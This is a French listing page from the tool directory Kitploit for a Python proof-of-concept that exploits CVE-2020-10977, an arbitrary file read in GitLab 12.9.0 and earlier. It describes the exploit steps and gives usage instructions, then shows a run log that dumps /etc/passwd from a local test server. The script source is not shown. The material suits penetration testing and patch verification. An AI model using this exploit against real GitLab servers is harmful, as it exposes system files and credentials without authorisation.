Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2020-10977 — GitLab 12.9.0 Lecture arbitraire de fichiers | Kitploit
Outils/GitHubGitHub/thewhiteh4t/cve-2020-10977
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubthewhiteh4t/cve-2020-10977

cve-2020-10977

GitLab 12.9.0 Lecture arbitraire de fichiers

Voir le dépôt
7019il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-10977

GitLab 12.9.0 Lecture arbitraire de fichiers

Cible : 12.9.0 et versions antérieures

Testé : GitLab 12.8.1

Lors d'une récente mission, j'ai trouvé une instance GitLab sur la cible. J'ai trouvé un PoC sur Exploit-DB, mais il utilise LDAP pour l'authentification, et LDAP était désactivé dans ce cas. J'ai donc créé ce script Python qui peut s'authentifier via l'interface graphique Web. Comme le PoC d'origine, il crée deux projets, un ticket dans l'un des projets avec la charge utile malveillante, puis déplace ce ticket d'un projet à un autre et lit automatiquement le contenu du fichier.

J'ai ajouté quelques éléments : le script demande un chemin absolu que vous souhaitez lire ; après avoir affiché son contenu, il demande un autre chemin et nettoie à la sortie. Les deux projets sont automatiquement supprimés lorsque vous quittez le script avec CTRL+C.

root@kitploit:~
$ python3 cve_2020_10977.py http://localhost twh p4ssw0rd
----------------------------------
--- CVE-2020-10977 ---------------
--- GitLab Arbitrary File Read ---
--- 12.9.0 & Below ---------------
----------------------------------

[>] Found By : vakzz       [ https://hackerone.com/reports/827052 ]
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t      ]

[+] Target        : http://localhost
[+] Username      : twh
[+] Password      : p4ssw0rd
[+] Project Names : ProjectOne, ProjectTwo

[!] Trying to Login...
[+] Login Successful!
[!] Creating ProjectOne...
[+] ProjectOne Created Successfully!
[!] Creating ProjectTwo...
[+] ProjectTwo Created Successfully!
[>] Absolute Path to File : /etc/passwd
[!] Creating an Issue...
[+] Issue Created Successfully!
[!] Moving Issue...
[+] Issue Moved Successfully!
[+] File URL : http://localhost/twh/ProjectTwo/uploads/5f74b01d2b58e4a57ca55e1ac8778650/passwd

> /etc/passwd
----------------------------------------

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
.
.
.
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
.
.
.
git:x:998:998::/var/opt/gitlab:/bin/sh
gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh
registry:x:993:993::/var/opt/gitlab/registry:/bin/sh
gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh
gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh

----------------------------------------

[>] Absolute Path to File : ^C
[-] Keyboard Interrupt
[!] Deleting ProjectOne...
[+] ProjectOne Successfully Deleted!
[!] Deleting ProjectTwo...
[+] ProjectTwo Successfully Deleted!

Dépendances

root@kitploit:~
pip3 install requests bs4

Utilisation

Créez un compte sur le GitLab cible et utilisez les mêmes identifiants avec le script.

root@kitploit:~
$ python3 cve_2020_10977.py -h
usage: cve_2020_10977.py [-h] url username password

positional arguments:
  url         Target URL with http(s)://
  username    GitLab Username
  password    GitLab Password

optional arguments:
  -h, --help  show this help message and exit

Crédits

  • Merci à vakzz pour avoir trouvé ce bug dans GitLab
    • Rapport HackerOne : https://hackerone.com/reports/827052
  • Merci à KouroshRZ pour avoir créé un PoC pour cet exploit
    • Exploit-DB : https://www.exploit-db.com/exploits/48431
Télécharger l’outil